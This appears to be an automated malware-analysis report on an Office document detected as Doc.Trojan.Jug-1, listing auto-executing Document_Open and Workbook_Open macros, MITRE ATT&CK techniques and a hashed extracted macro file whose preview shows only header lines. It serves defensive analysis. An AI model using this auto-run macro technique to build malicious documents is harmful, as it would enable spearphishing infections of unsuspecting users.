Verdict: MALICIOUS
Risk Score: 160

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The file is identified as malicious by ClamAV with the signature Doc.Trojan.Jug-1. Static analysis revealed VBA macros, specifically Document_Open and Workbook_Open auto-execution handlers, indicating a likely attempt to run code as soon as the document is opened. The macros are heavily obfuscated, but their presence and the high-severity heuristics suggest that their primary function is to download and execute a secondary payload.
Heuristics (4)
- ClamAV: Doc.Trojan.Jug-1 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Jug-1
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): Document contains VBA macro code
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- Workbook_Open macro (high, OLE_VBA_WBOPEN): Workbook_Open macro
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 93055 bytes | 402394a15732d3bfef2124069783871e548d8b133d3c051a53e5d158205e88b3 |
Preview script: first 1,000 lines of the extracted script

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
```
... (truncated)